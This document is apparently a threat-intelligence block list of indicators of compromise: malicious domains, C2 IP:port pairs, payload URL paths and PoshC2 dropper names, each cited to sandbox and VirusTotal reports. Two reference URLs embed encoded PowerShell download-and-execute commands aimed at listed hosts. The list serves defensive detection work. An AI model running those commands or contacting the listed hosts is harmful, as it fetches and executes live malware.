# Reference: https://www.virustotal.com/gui/file/a5f28823626d57c3324aaf93ddb94eed6cc01d6bd815fdfe1fe0c67c93ca8f7d/detection

x0.at/nCgJ.bin

# Reference: https://app.any.run/tasks/e6886dec-cac6-469a-b0e3-7b1d7ce78c37
# Reference: https://www.virustotal.com/gui/file/049717cb511767ba59737ab654fe0141a3ef373e44f0f019c2e398fc14d51418/detection

microsoftech.shop

# Reference: https://www.virustotal.com/gui/file/c7b3edb4ac469044fac6e277e8d44c17ddefb6c0574bea48172cfca93ed6b726/detection

cda-foundations.s3.us-east-1.amazonaws.com

# Reference: https://www.virustotal.com/gui/file/f99f15c3129acabd5a5a60d96ed70c9405efc054ba0b9ad8e434026d80e16b85/detection

0daydreams.net

# Reference: https://x.com/skocherhan/status/1928440873433309326
# Reference: https://x.com/JAMESWT_WT/status/1928471343139275132
# Reference: https://app.any.run/tasks/3b904d30-3831-47b9-81a3-956e17d2dd92
# Reference: https://www.virustotal.com/gui/file/7e7233333d5f8e00d619fd33b9a5df95c3511f29f85bdf2166208c37cbe0a61b/detection
# Reference: https://www.virustotal.com/gui/file/bc3f44f92c6bdb03a0ac5c6ebb4204c1f834f94079161c6591df2ffe4d9d5436/detection

cahasdxca123.com
domainservicecontrol.com

# Reference: https://x.com/malwrhunterteam/status/1929904966610669620
# Reference: https://x.com/salmanvsf/status/1930179705229193583
# Reference: https://x.com/smica83/status/1930356671668453651
# Reference: https://www.virustotal.com/gui/file/d5c6c135a18021938ee93828b48d0b772c2ec870d04bb3c6f89f9abc33f7c798/detection
# Reference: https://www.virustotal.com/gui/file/8e4dd89d9d7c0a15cd79fe9d2891a6b111cfe531c7b4f5c2bbc8ae08e82ed870/detection
# Reference: https://www.virustotal.com/gui/file/ae21a12721baccba97fcd45823afbfc71c864c0c79fa0662aeb0c0dabdb5d8df/detection
# Reference: https://www.virustotal.com/gui/file/b5da6cdea3ceb91a555dd5b74638d55b59dd6376de8f7e26e2c2df671695bfb9/detection
# Reference: https://www.virustotal.com/gui/file/2830bd85e6754e926e050f092822c3276d69f2209ec4b86398033391772b189b/detection
# Reference: https://www.virustotal.com/gui/file/80318e73a2c37c61bedf5f2aa75734141cc3fb15d7f96c7a41d7f9e1abef258e/detection
# Reference: https://www.virustotal.com/gui/file/92718b74bb64fa92fa0e47aae96b7aee59b592abc75c42caa46f2248c587adb9/detection
# Reference: https://www.virustotal.com/gui/file/3481d204f0865577c9643d8d3f0ed45d6555ae4476d43dc80ffc94e0e6a0ddf9/detection

http://5.101.81.42
http://5.101.82.52
http://5.101.83.18

# Reference: https://x.com/smica83/status/1934408123282022751
# Reference: https://www.virustotal.com/gui/file/2c3054c2953053e8c70211587bf33cb26562b3edb3770c91a17f9e49277dd5f2/detection

germanov.xyz

# Reference: https://www.malware-traffic-analysis.net/2025/06/18/index.html
# Reference: https://www.virustotal.com/gui/file/4fa6df014fea29cd34c51a70ecc77fe971457143e3d0da2ad4e0d6ed14a46424/detection

eddereklam.com/drlo.zip
eddereklam.com/tuqw.zip

# Reference: https://x.com/salmanvsf/status/1935590497088852093

pub-a06eb79f0ebe4a6999bcc71a2227d8e3.r2.dev

# Reference: https://x.com/smica83/status/1936554735592476908
# Reference: https://www.virustotal.com/gui/file/92673255eee7a3b54d07498c2c6cf3d2ea61e800c2594d2f5267143ffc90ef0c/detection

example.com/load2/src/file.txt

# Reference: https://x.com/smica83/status/1937107452589171103
# Reference: https://www.virustotal.com/gui/file/83b62b39d0fa49698d5bb13b57393b6de01412e7cbea3ab678d21f00b9f01a28/detection
# Reference: https://www.virustotal.com/gui/file/df071df73a1d9a4ea0eb5d62b4d00a08528dbd1ba6f1da91918e02a27e77533e/detection
# Reference: https://www.virustotal.com/gui/file/f2faa4a5f3620f076e02b330eb67a3cfb970d2403f41b79633bf5ee93ec23b82/detection

mintagency.info
careers.mintagency.info
mail.mintagency.info
mt-link.mintagency.info

# Reference: https://x.com/JAMESWT_WT/status/1940105088909156724
# Reference: https://x.com/ShadowOpCode/status/1940334306909618463
# Reference: https://x.com/skocherhan/status/1940324554402144605
# Reference: https://www.virustotal.com/gui/file/26a5e18d6ac86a865250452528664d4cde74187d741fcf98370efb34d4219490/detection
# Reference: https://www.virustotal.com/gui/file/1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75/detection
# Reference: https://www.virustotal.com/gui/file/66bb810e16031a891196487fd8ddc01cb2ac5c95191a49a6360b098d3b9b9bec/detection

180.178.189.17:33338
180.178.189.17:443

# Reference: https://x.com/RussianPanda9xx/status/1940831134759506029

blake-wright-andorra-learners.trycloudflare.com

# Reference: https://www.virustotal.com/gui/ip-address/45.137.22.112/relations
# Reference: https://www.virustotal.com/gui/file/d8604df1be3bb24d3f93433e192bf49635a03cf0ebc319274ec7318668e792bf/detection

45.137.22.112:3389
newgfttgjjk.duckdns.org

# Reference: https://www.virustotal.com/gui/file/bc71f8278a3a040089f3c4c3e92c3adaa8c098bfebb949f5dd14cd2c17c2598d/detection

pub-75d9e09aa5304a0f9b7cd6c04c01b53e.r2.dev

# Reference: https://www.virustotal.com/gui/file/030d719412fc375d9fdfeb2bc12e325d320fc1e0415ee319a481c4f1bc872434/detection

95.214.54.172:7607

# Reference: https://www.virustotal.com/gui/file/12ba178c082a0a281eaf6a742f9ad4bc75940b73a9b186f103b45652d77dd617/detection

141.98.6.34:5554

# Reference: https://x.com/smica83/status/1944502436326002946
# Reference: https://www.joesandbox.com/analysis/1735424#iocs

pesterbdd.com

# Reference: https://x.com/BlinkzSec/status/1944803587302768937
# Reference: https://urlhaus.abuse.ch/url/3583285/

hollywoodcafeonmain.com/wplus.ps1

# Reference: https://www.virustotal.com/gui/file/eefdc013fae015be06900c47d879e402cfea2ddd6a24db11b4007ccefc27e8df/detection

104.207.148.168:8080

# Reference: https://x.com/ElementalX2/status/1945145930954469761
# Reference: https://www.virustotal.com/gui/file/6c5a89c3dd7b596fd1be2aa88eddb3234bf6f006638c9bb3e04c33f416d28080/detection
# Reference: https://www.virustotal.com/gui/file/8556f07ceb37e726a66c357cb3b76bba1eb13c21ffe85fdb37685ecfd06205db/detection
# Reference: https://www.virustotal.com/gui/file/9d95228173bf5f29bc3d26f19e2962ca65fab572095aeafd955bde7df574ee9c/detection

http://5.101.80.15

# Reference: https://x.com/k3yp0d/status/1945771813868314758
# Reference: https://bsky.app/profile/k3yp0d.bsky.social/post/3lu5l5t5eq22o
# Reference: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors
# Reference: https://www.virustotal.com/gui/file/b3282dc58ad961911d94b712cea11f649b0ba785d7ff74d7ed9946e1260dd521/detection

34.241.171.114:443
classicfonts.live

# Reference: https://www.virustotal.com/gui/file/f1c217fa4e46b9a4df22adea62d1acd4f3016c1aac17737611f4f178bfcf1bc1/detection

http://89.221.217.65

# Reference: https://www.virustotal.com/gui/file/ae71cb4c8c5c46b04e12731f9184f829e5f4fb71460fda8089ece9aeaf815aee/detection

illegalwebsite.com

# Reference: https://app.validin.com/detail?find=powershell%20IEX(New-Object%20Net.Webclient).DownloadString(http%3A%2F%2Fde1c5dc3da78.eu.ngrok.io)&type=raw&ref_id=5c1a9b34db7 (# 2025-07-19)

de1c5dc3da78.eu.ngrok.io

# Reference: https://app.validin.com/detail?find=powershell%20-WindowStyle%20Hidden%20IEX%20(New-Object%20Net.WebClient).DownloadString(%27https%3A%2F%2Fshinobotps1.com%2Fdownload_get.php%27)%3B&type=raw&ref_id=5c1a9b34db7 (# 2025-07-19)

shinobotps1.com
shinohack.me

# Reference: https://www.virustotal.com/gui/file/35f27fb2e665ca608d9b94ba89750ed27aed82aa554806ebe3d8ce9bec7508dc/detection

pa.reyes-holdings.uk

# Reference: https://x.com/smica83/status/1947624319430922338
# Reference: https://tria.ge/250722-nrah9svwbz/behavioral1
# Reference: https://tria.ge/250719-q8eweswqv9/behavioral2

66.63.187.20:8000
burden-psp-holding-evaluation.trycloudflare.com
j-bookmarks-annie-possess.trycloudflare.com

# Reference: https://www.virustotal.com/gui/file/a31eba665f419b0d35d43cbb84ba31851cb6bdef6bf2ac239866bdcda532342f/detection

intuite.icu
intuite.info

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2025-07-26)

195.66.213.157:443

# Reference: https://x.com/1nt3l_hunt/status/1949849917599400278

87.121.221.113:9090

# Reference: https://x.com/volrant136/status/1949856151610233052

doublecounter.cfd
doublecounter.fun
doublecounter.top

# Reference: https://x.com/ShadowOpCode/status/1950933939998097676
# Reference: https://www.virustotal.com/gui/file/54ed8df92b06ede84497598d70f41779697ee4a03c8fc1496a47ea0ea45d1ad9/detection

http://216.9.224.88

# Reference: https://www.pointwild.com/threat-intelligence/trojan-winlnk-powershell-runner
# Reference: https://www.virustotal.com/gui/file/506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6/detection
# Reference: https://www.virustotal.com/gui/file/d6811b643d0ec877760e780d87a0993e04d3b37177f8e004f913e25b5a5faefe/detection

mal289re1.es
uldg354.eu
shipping-hr.ro

# Reference: https://x.com/1ZRR4H/status/1952495584730071482
# Reference: https://www.virustotal.com/gui/file/aa23f21bae3d3bbe722bcd03aaf8c440bede9a5ec01d3840f87567ea41925c98/detection

http://144.91.103.204

# Reference: https://x.com/smica83/status/1952416486343229708
# Reference: https://tria.ge/250804-vm5xyas1bv/behavioral1

andrefelipedonascime1753562407700.0461178.meusitehostgator.com.br
/JIBXKFGnby_3/

# Reference: https://x.com/smica83/status/1952409663367975089
# Reference: https://www.virustotal.com/gui/file/8c882a44da33b7ea1e3992423525404c785570008ec9cac0e41027912ad6e23c/detection

http://64.7.198.123
96.9.124.209:8080

# Reference: https://www.virustotal.com/gui/file/fc1ebd19fb145efc56c192c3f6baa32a0f69311c995b2316cf13371316b53ec1/detection

control2lecture.store
hungnzshinklshk.ink

# Reference: https://x.com/smica83/status/1954613441009750341
# Reference: https://www.virustotal.com/gui/file/10dd3d8c69c28d05aa1b29440d576362ecc901c5da270d655ff1a853f732e73a/detection

3-4px.pages.dev

# Reference: https://x.com/smica83/status/1954897718524232137
# Reference: https://www.virustotal.com/gui/file/cd5fd6a6e81efd1eade5693597330c7cd1476ebbf5f425e0ac476d4a2ad4f4cf/detection

valmamagenta.workers.dev
telegram-worker.valmamagenta.workers.dev

# Reference: https://x.com/ShadowOpCode/status/1954853970012238296
# Reference: https://www.virustotal.com/gui/file/508591e3e426219da8658096aa48fa5658ef6ef67badcf4c4f316d5396578feb/detection

doublemanfs.com

# Reference: https://g0njxa.medium.com/meowsterio-weaponizing-clickonce-in-2025-8c2595a817c8
# Reference: https://www.virustotal.com/gui/file/c7e13b2ad0523b701e1ccbfe6cb77d63b55c6a41f645bc9a6c98c8d8ff82c61b/detection
# Reference: https://www.virustotal.com/gui/file/97eba8090a2a043125862667d9d37dc0e1a36613ac7e3a37826e56d63a78bc73/detection
# Reference: https://www.virustotal.com/gui/file/846dd064b89ba2eea0cdea76f4f660fd2ebc0bb4c007b10f46e565c9ec9848a9/detection

178.250.188.57:38493

# Reference: https://x.com/ElementalX2/status/1955509557272203486
# Reference: https://app.validin.com/detail?find=188.244.191.61&type=ip4&ref_id=4d62866933c#tab=resolutions
# Reference: https://www.virustotal.com/gui/file/20665f5812fa6ed99ebef18203e0d333805728ceb7342afdbbb33e6579040edc/detection

216.239.32.21:7070
216.239.34.21:7070
216.239.38.21:7070
blog.ddnsking.com
blog.hldns.ru
blog.sytes.net
blog.zapto.org

# Reference: https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain
# Reference: https://www.virustotal.com/gui/file/bc157725ccfe5c3c0fbd8e1c0361defec593601eaa42a9a8dbff93309148cc38/detection

pharmacynod.com

# Reference: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/
# Reference: https://github.com/Cisco-Talos/IOCs/blob/main/2025/08/ps1bot-malvertising-campaign.txt

http://109.120.179.170
http://131.174.164.238
http://147.45.45.168
http://181.174.164.12
http://181.174.164.170
http://181.174.164.180
http://181.174.164.2
http://181.174.164.201
http://181.174.164.238
http://181.174.164.47
http://213.176.113.168
http://5.252.153.94
http://62.60.178.24
http://77.110.116.227

# Reference: https://x.com/JAMESWT_WT/status/1955883901299101776
# Reference: https://www.virustotal.com/gui/file/d51f81ee026df39447143b67eaf16326c30e0c9477c0d50507f1fbfffe53abd6/detection

102.135.95.102:7777

# Reference: https://x.com/ShadowOpCode/status/1955988458645668169
# Reference: https://app.any.run/tasks/36e5dd2e-5674-48e5-90c1-1653d53b3f7b

macino21.gt.tc

# Reference: https://www.virustotal.com/gui/file/219aac79d17dacb27f7fd1fbd62a435f3b4ea7054d086e8962fafe334dc55680/detection

84.21.189.228:5504

# Reference: https://securityaffairs.com/181203/cyber-crime/encrypthub-abuses-brave-support-in-new-campaign-exploiting-msc-eviltwin-flaw.html
# Reference: https://app.validin.com/detail?find=a959f63897979d907ef8ad21e2c971ae&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://app.validin.com/detail?find=1ca931e6876392468fdb732e580cf7ad&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://app.validin.com/detail?find=80d8bea73badb21e88306c6f387aed64&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://www.virustotal.com/gui/file/eab7d0b897d425a2fce561a609692d810a456e93956cb0db1843f823be406bc7/detection

audiorealtek.com
bitacid.net
cjhsbam.com
reaitek.com
rivatalk.net
soft-gets.com
xn----8sbn4abdhnl.com
api.rivatalk.net
fastdomain-uoemathhvq.workers.dev
safesurf.fastdomain-uoemathhvq.workers.dev

# Reference: https://x.com/JAMESWT_WT/status/1957028393221800020
# Reference: https://tria.ge/250817-lypknatzew/behavioral1

196.251.72.192:1234

# Reference: https://www.virustotal.com/gui/file/5f3e26e42fd5e449cb388298ca92e36434c21705d6db45226d10ecdb11dfee8d/detection

95.164.53.214:5554

# Reference: https://x.com/smica83/status/1957723516918460493
# Reference: https://www.virustotal.com/gui/ip-address/31.57.35.90/relations
# Reference: https://www.virustotal.com/gui/file/3860ee4d50aafb58a16ed8713cbdebc2bb044b61c2475c38848660bb0d25b093/detection
# Reference: https://www.virustotal.com/gui/file/035bcada4326a06d28fb3b6aa9e833facc5b9e1fe2eb931a53dd1ac2050b1b67/detection

http://31.57.35.90
31.57.35.90:9555
esdras.ddns.net
farzads.asuscomm.com
neoesdras.ddns.net

# Reference: https://x.com/smica83/status/1957719173959733371
# Reference: https://tria.ge/250819-j5vzxa1rt4/behavioral1

provrm.ru
/d1ovu/pon/raw/refs/heads/main/res.bat

# Reference: https://x.com/smica83/status/1958604670135673077
# Reference: https://www.virustotal.com/gui/file/f7aa5a03767a01c819d6b504b70ad1f1cc51a269f17346787512746a5af3573d/detection

/k53xupn43/i965652f/refs/heads/main/m.ps1

# Reference: https://x.com/smica83/status/1958799973773942959
# Reference: https://x.com/JAMESWT_WT/status/1960296641728012587
# Reference: https://tria.ge/250822-jr8nvadp9x/behavioral1
# Reference: https://app.any.run/tasks/45637a70-ead4-4141-91de-31b51ecdcbdb

103.63.28.71:1433
103.63.28.71:2024

# Reference: https://x.com/smica83/status/1958804084879741067
# Reference: https://www.virustotal.com/gui/file/fe814a3b59fc8e874288f81c96625ccba75a07b953bef3ac8d6acd4832f51d53/detection

/hectorp12/respaldo1212/main/cmd.txt

# Reference: https://x.com/smica83/status/1958921706979963239
# Reference: https://tria.ge/250822-teev4swqs4/behavioral1

/api/file/wQ4vTmBA

# Reference: https://x.com/JAMESWT_WT/status/1959198084556267909
# Reference: https://app.any.run/tasks/56cc97d3-31e4-4b6f-aa99-ec2f28e7182d
# Reference: https://www.virustotal.com/gui/file/b018115f3ccac4d1b0fd586e6ab8da27492cbe53dbaa87a4bf42ef7fd79d0803/detection

huygtryguh.lol

# Reference: https://x.com/smica83/status/1959719935908643203
# Reference: https://tria.ge/250824-zhbwhsyvct/behavioral1

pottery-determination-oakland-kingston.trycloudflare.com
victim-mar-tones-outreach.trycloudflare.com

# Reference: https://x.com/smica83/status/1959585629647647007
# Reference: https://tria.ge/250824-n253xstzbx/behavioral1

bbrlxwtkbgvpnpfykexu.supabase.co

# Reference: https://x.com/k3yp0d/status/1959853255074189455
# Reference: https://app.any.run/tasks/eb4538dc-7efc-4e8c-a642-cc1251eba849
# Reference: https://www.virustotal.com/gui/ip-address/91.245.254.76/relations
# Reference: https://app.validin.com/detail?find=9b8a19bce8022f7cddff522e62c63dfc&type=hash&ref_id=6b92f485b65#tab=host_pairs (# 2025-08-25)
# Reference: https://www.virustotal.com/gui/file/c7e9bb895c490c5fe8db36a67a3393e1a3d0b49ffb8c0fe0cb3f4272b7a9e3ec/detection

1kkk-ebr.pages.dev
1kkve.pages.dev
70addb0e.redirectto-zz6.pages.dev
actupon.it.com
approving.it.com
are-you-human.pages.dev
begins.it.com
benten.ink
bestpicked.best
blabberingmate.com
brightsite.it.com
buzzingflybees.com
bx55kelly.pages.dev
carabineros.top
cloudingcdn.biz
desiload.art
desmok.shop
ferari1.email
ferrabits.com
flashwebonline.org
fre-sec.pages.dev
gemmrktoffer.org
gocomplete.it.com
gucproceed.pages.dev
hencook.work
jekitech.cloud
lanterncoast.com
leadingzones.live
letscomplete.it.com
letsprove.it.com
lilder.top
llder.top
loadingnext.fit
monakovi.pages.dev
nextstepgo.pages.dev
nowget.it.com
onward.it.com
passon.it.com
pestern.pages.dev
power-walk.info
prass.pages.dev
proceed.it.com
proceedingto.pages.dev
redirectto-zz6.pages.dev
resolviaglobal.com
ritavoi.com
robinvilla.it.com
royce.city
roycebits.com
royevita.com
rusu.blog
saintlaur.pages.dev
secad.pages.dev
secas.pages.dev
serveweb-2rj.pages.dev
singlelink.pages.dev
speedyhare.club
spintowin.shop
ssdash.pages.dev
summitvia.com
tesesern881.pages.dev
turismo555.website
tutag.top
urusbits.com
uruvita.com
venai.pages.dev
verify-if-human.pages.dev
visithub.best
yexteral.pages.dev

# Reference: https://www.virustotal.com/gui/ip-address/87.251.69.66/relations

aryudrfesr.buzz
brtygfwfrt.buzz
cdnsecure.best
cloudsecuity.best
cloudsecurity.best
crwecgivgy.buzz
drioaryase.buzz
errtjhohyu.buzz
passto.it.com

# Referecne: https://x.com/Merlax_/status/1960048599678493033
# Reference: https://www.virustotal.com/gui/file/3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df/detection

mezi.bet
rs.mezi.bet

# Reference: https://x.com/k3dg3/status/1959997478335648092
# Reference: https://tria.ge/250825-sehrbsak7v/behavioral1

185.28.119.179:1234

# Reference: https://x.com/smica83/status/1960344607226531966
# Reference: https://tria.ge/250826-rea6tazsht/behavioral1

http://168.100.10.73
168.100.10.73:5000

# Reference: https://x.com/smica83/status/1960614147990683698

/hi4201225/gv725/
/ud-progen2/725-mrw/

# Reference: https://www.virustotal.com/gui/file/3ad68200bdff9069561ff7bf99a913ee24ad8409398dde4f3adb5d6cbea07788/detection

212.22.86.82:2020

# Reference: https://x.com/JAMESWT_WT/status/1963825407939006749
# Reference: https://www.malware-traffic-analysis.net/2025/09/03/index.html

85.209.129.105:2020

# Reference: https://x.com/drb_ra/status/1961062947175694451

185.235.178.14:443

# Reference: https://x.com/JAMESWT_WT/status/1961292003620102532
# Reference: https://app.any.run/tasks/c098d1df-add9-4995-b164-1c20c1fd51be
# Reference: https://www.virustotal.com/gui/file/e5b8a45ac9d7d834bb73cff512a680bf0926d97ee5410601f503b27cbd80bbb4/detection
# Reference: https://www.virustotal.com/gui/file/7309e3ed236fcf61a68680a73fc6f8c740476504cac0dd6b2dd31b7331fec7e9/detection

bilaskf.com

# Reference: https://www.virustotal.com/gui/ip-address/176.96.137.225/relations
# Reference: https://www.virustotal.com/gui/file/e7a7afbb64b3329705966fa898676d24d95967a7a782ccaccebf7713a68bbb47/detection

app-download-pc.accesscam.org
app-download-pc.freeddns.org
app-download.loseyourip.com
app-driver.kozow.com
dcccd.accesscam.org
downlad-x.casacam.net
downlad.camdvr.org
shorten-urls.kozow.com
shorten-urls.work.gd

# Reference: https://x.com/smica83/status/1961680045438558405
# Reference: https://tria.ge/250830-heq3lavwax/behavioral1

andrefelipedonascime1756166725866.0531865.meusitehostgator.com.br

# Reference: https://www.virustotal.com/gui/file/bd7f85666f40b09884c13443a404389ba18708d3c8cafca7371522f563d83856/detection

http://5.8.19.43
5.8.19.43:443

# Reference: https://x.com/JAMESWT_WT/status/1963463508353286359
# Reference: https://app.any.run/tasks/b007ae14-b021-4d3d-9e71-7f3b2d5fa508
# Reference: https://www.virustotal.com/gui/file/e2773afcc680bcafa076687dd51785fa99b0fba77e4765b1c4f64b6278522edd/detection

biokdsl.com

# Reference: https://x.com/BlinkzSec/status/1963186318382452968
# Reference: https://www.virustotal.com/gui/file/61ec38741f1b45c5e797ab56bedc01f63fb089d1946f978a1ba735602e2cb455/detection

starmanx.org

# Reference: https://www.virustotal.com/gui/file/789df0bfdf91c7990542d571597ab7baf8789fb114bd2426ba595d116870f22e/detection

81.21.1.205:4531

# Reference: https://www.virustotal.com/gui/file/ee4960b8b58b91c85ee01ebc6f40752dd0dcb04c2695428da507484670f1091a/detection

34.132.183.57:5552
frygzjyhtiunvhvnacif.supabase.co
win2325.webredirect.org

# Reference: https://x.com/malwrhunterteam/status/1964034069894754812
# Reference: https://www.virustotal.com/gui/file/56aa74793533fdcfd26449e66295adb31a920afc9993005c27a4e274f4196f4a/detection
# Reference: https://www.virustotal.com/gui/file/84f34f24a7f7852ac1c5e99ec3de6e215138d7b8a39514963dc6596945b105d8/detection

http://185.193.125.160
ololo-dsj.pages.dev
yr52byzdja.pages.dev
42a25631.yr52byzdja.pages.dev

# Reference: https://x.com/smica83/status/1965698562706313405
# Reference: https://tria.ge/250910-kner2axxbz/behavioral1

5.2.217.61:4444

# Reference: https://x.com/ShadowOpCode/status/1966143414489227695
# Reference: https://www.virustotal.com/gui/file/37e96cc01fcf657c68d05cb1814e63eaa46582c21a23edec1a8e5d6d81257f9c/detection

rihby.com

# Reference: https://www.virustotal.com/gui/file/081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d/detection

80.253.249.186:5504

# Reference: https://www.virustotal.com/gui/file/0127c758de634d04ae1c721ad2d8ce63574366e83dd140ad1a34d8f75418b712/detection
# Reference: https://www.virustotal.com/gui/file/5534ca1aa6be7ecd2f94e13509d9d464579b6e5ee87b02884bceee424dfe999e/detection
# Reference: https://www.virustotal.com/gui/file/807e2578fb2c305ec05b9378ee3f8cc6cab2ca431313d3b84d6f0db6ee8f5656/detection

csend.net

# Reference: https://x.com/smica83/status/1970604652694585853
# Reference: https://www.virustotal.com/gui/file/e1fe9bbaaf7f480d6e8404c2f87d76d61abeace6120ee39b327af8188d1076a8/detection

ms-distro.space
appl.endl.site
sixsixsix.ms-distro.space

# Reference: https://x.com/solostalking/status/1971560418041819283

neutronsparty.live

# Reference: https://tria.ge/251001-njz4ysxlx7/behavioral1
# Reference: https://www.virustotal.com/gui/file/03446e7dc87a01a5eac65bc3d82b02a488393cd2d6bd213ab3d90ffca25d6456/detection

134.255.211.63:8443
garphicbelos.com
sub.garphicbelos.com

# Reference: https://x.com/smica83/status/1975087975831843078
# Reference: https://www.virustotal.com/gui/file/b521c89d99dfd6a4e14d93db4a226a484ca6297b699d8dc716156dda84bd22a5/detection

elegant-starburst-d473a1.netlify.app

# Reference: https://x.com/smica83/status/1974947405910155548
# Reference: https://www.virustotal.com/gui/file/1bcc710829bf29f31834501f4b331d89089c16f1c3bf9fefcaabd8c3ead66aad/detection
# Reference: https://www.virustotal.com/gui/file/6742c888a46175c1667d5f5c8eb50bbd902ec9104d14a6a8c0b44c613f1a5a81/detection

178.17.62.9:81
178.17.62.9:82
sslprouser.online

# Reference: https://x.com/smica83/status/1974938930278694920
# Reference: https://www.virustotal.com/gui/file/5a6eb07f992dcbbd97a391e455332bbeaeca1174739d98de2dbbead7e6e346c8/detection

seagreen-capybara-853936.hostingersite.com

# Reference: https://x.com/smica83/status/1974241200837198052
# Reference: https://www.virustotal.com/gui/file/1a9d6a860d046af0c18dc02a3e445c9bf70a55b6aa3f55b48f0e82241eef1d19/detection

facturastbs.shop
grupoatvsac.com
grupouwle.it.com
midasx.site
mnfgrupo.store
affs.grupoatvsac.com
bmx.mnfgrupo.store
cgf.facturastbs.shop
cgf.midasx.site
md.grupouwle.it.com

# Reference: https://x.com/smica83/status/1973792161289416786
# Reference: https://www.virustotal.com/gui/file/036501416a25798cc43e7f156fec0eb33485bb5da2be4a924714463f4248f1a9/detection

apocolypser.s3.us-east-1.amazonaws.com
reporter9128.s3.us-east-1.amazonaws.com

# Reference: https://x.com/smica83/status/1975137863999381806
# Reference: https://www.virustotal.com/gui/file/a2f153c69a85cedabb5f56c03d669b3b3cd8c6251df6cdd22612173e0a4e1411/detection

bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi.ipfs.dweb.link
bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi.ipfs.w3s.link
/ipfs/bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi/
/bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi/

# Reference: https://x.com/smica83/status/1975194167564460309
# Reference: https://x.com/skocherhan/status/1975228835575759210
# Reference: https://www.virustotal.com/gui/file/96049994641fea4958fbd17eff8bd04aeade173ead38a04989637a33cbda74c2/detection

147.185.211.211:33519

# Reference: https://x.com/cyber_ra1/status/1976170806637101401

45.43.11.138:8000

# Reference: https://x.com/suyog41/status/1976256819447132170
# Reference: https://www.virustotal.com/gui/file/dd2bbd0f59d2b87a971380e97cb759caf3192aa05617fd19d7a6a15218549c96/detection

globalsources.world

# Reference: https://x.com/smica83/status/1976904744817078499
# Reference: https://www.virustotal.com/gui/file/b7e4f3359bd414470423ca62f7ea1ac497cad0aed6ad60df2217527fff2679cf/detection

meusitehostgator.com.br
009423af623840eb89fb1759543879431.1851946.meusitehostgator.com.br

# Reference: https://x.com/BlinkzSec/status/1977041350643401174

38.128.251.126:7895

# Reference: https://x.com/smica83/status/1978600894217269424
# Reference: https://www.virustotal.com/gui/file/9cfdd19ba384d9b247c12d49368dbbe0720dc020e28c9af32a37f7c5edcb5be8/detection

nullarmor.cc

# Reference: https://x.com/smica83/status/1978771256762606024

http://45.9.148.46

# Reference: https://x.com/Malwar3Ninja/status/1978352792398856319

85.209.129.37:5504

# Reference: https://x.com/skocherhan/status/1978568094072156558

asusdriver.live

# Reference: https://x.com/smica83/status/1978880380187938929
# Reference: https://www.virustotal.com/gui/file/84f6f3a7c219b94c9689601a4b179880b12d661f38456f38f3b4e197566855f2/detection
# Reference: https://www.virustotal.com/gui/file/b67fb83392e59d2c62ba606c44cfaa9141d98bd7fed7028539b5ea70cc24ed87/detection
# Reference: https://www.virustotal.com/gui/file/cc5366e31fdaaad3fda3936f9ba67fce2e9c38f34c0607bea1a3855189edd4c0/detection

http://185.208.158.42

# Generic

/Posh_v2_dropper_x64.exe
/Posh_v4_dropper_x64.exe
/poshc2+user.txt
